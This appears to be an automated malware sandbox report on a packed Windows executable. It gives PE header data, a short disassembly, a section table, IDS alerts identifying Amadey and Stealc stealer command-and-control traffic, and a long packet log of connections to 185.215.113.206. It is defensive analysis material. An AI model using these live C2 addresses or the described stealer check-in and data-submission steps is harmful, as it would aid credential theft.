                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                        Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                        OS Version Minor:1
                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                        File Version Minor:1
                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                                                                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                        jmp 00007F50491AF01Ah
                                                                                                                                                                                                                                                        jng 00007F50491AF031h
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        jmp 00007F50491B1015h
                                                                                                                                                                                                                                                        add byte ptr [edi], al
                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add al, 00h
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax+eax*4], cl
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], dl
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [ecx], al
                                                                                                                                                                                                                                                        or al, byte ptr [eax]
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [ecx], cl
                                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        adc byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add eax, 0000000Ah
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], dh
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax+00000000h], cl
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [edx], ah
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], cl
                                                                                                                                                                                                                                                        add byte ptr [eax], 00000000h
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                        Programming Language:
                                                                                                                                                                                                                                                        • [C++] VS2010 build 30319
                                                                                                                                                                                                                                                        • [ASM] VS2010 build 30319
                                                                                                                                                                                                                                                        • [ C ] VS2010 build 30319
                                                                                                                                                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                        • [LNK] VS2010 build 30319
                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                        0x10000x2490000x16200bcde4c9e6bcae76f8d3cec3a4d8b4aa9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .rsrc0x24a0000x1ac0x200bd38996da8dd034899ebe3305f7ca4a8False0.580078125data4.55900838675945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        0x24c0000x2a80000x200a4c36d8ee16fbe20c9ba8dce8face6a4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        smsoyiwh0x4f40000x1a20000x1a120059cc2be3edc0b8304f678f6031ee6909False0.9946275893392269data7.952862175295011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        mwymltiy0x6960000x10000x4004a95e2a0de6370b6e8657d771c96c98fFalse0.81640625data6.288569151500908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        .taggant0x6970000x30000x22006782a9e0e8ff5f86ae067150a97eede1False0.06606158088235294DOS executable (COM)0.7157932589078735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                        RT_MANIFEST0x694f480x152ASCII text, with CRLF line terminators0.6479289940828402
                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                        2024-11-21T00:49:00.753657+01002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.4380192.168.2.550095TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:10.259311+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:10.723073+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.549704185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:10.845439+01002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.20680192.168.2.549704TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:11.186378+01002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.549704185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:11.318942+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.20680192.168.2.549704TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:12.903829+01002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.549704185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:13.654005+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549704185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:36.726048+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549773185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:38.815700+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549773185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:40.191088+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549773185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:41.366888+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549773185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:45.253488+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549773185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:46.375478+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549773185.215.113.20680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:49:52.357533+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549901185.215.113.1680TCP
                                                                                                                                                                                                                                                        2024-11-21T00:51:04.999541+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.550089185.215.113.4380TCP
                                                                                                                                                                                                                                                        2024-11-21T00:51:09.550411+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.55010131.41.244.1180TCP
                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:00.753657103 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:00.753715038 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:00.847345114 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:08.255434036 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:08.376595020 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:08.376759052 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:08.377001047 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:08.498898029 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:09.780477047 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:09.780554056 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:09.785913944 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:09.907515049 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.259154081 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.259310961 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.260603905 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.362879038 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.362911940 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.381855011 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.456655979 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.722989082 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.723073006 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.723083973 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.723128080 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.724787951 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:10.845438957 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186244965 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186327934 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186378002 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186415911 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186424017 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186459064 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186494112 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186508894 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186527014 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186542034 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186557055 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186568022 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186577082 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.186609983 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.194926977 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.195038080 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.197760105 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.318942070 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.772907019 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.773014069 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.868886948 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.868947983 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.989847898 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.990468025 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.990480900 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.990520954 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.992114067 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:11.992126942 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:12.873364925 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:12.873496056 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:12.903728962 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:12.903829098 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.193300962 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.315268040 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.653917074 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.653939009 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.654005051 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.654005051 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.658409119 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.658463955 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.658628941 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.658674002 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.663918972 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.663932085 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.663990974 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.664045095 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.672444105 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.672482014 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.672513008 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.672549963 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.680636883 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.680702925 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.680747032 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.680790901 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.691514969 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.691587925 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.691592932 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.691642046 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.790651083 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.790750027 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.790795088 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.790843010 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.794928074 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.794938087 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.794995070 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.800446033 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.800458908 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.800508976 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.800560951 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.808955908 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.808969975 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.809026957 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.809062958 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.817452908 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.817507982 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.817512035 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.817550898 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.854990959 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.855076075 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.855139017 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.855179071 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.859277010 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.859343052 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.859347105 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.859381914 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.865868092 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.865890980 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.865932941 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.865968943 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.874317884 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.874377966 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.874398947 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.874450922 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.882776976 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.882846117 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.882858992 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.882903099 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.891264915 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.891356945 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.891386986 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.891438961 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.899739981 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.899805069 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.899811029 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.899842978 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.931751966 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.931763887 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.931832075 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.931881905 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.931926012 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.932353973 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.932409048 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.932463884 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.932512045 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.940375090 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.940438032 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.940499067 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.940550089 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.948354959 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.948426962 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.948472977 CET8049704185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.948527098 CET4970480192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:13.955583096 CET8049704185.215.113.206192.168.2.5
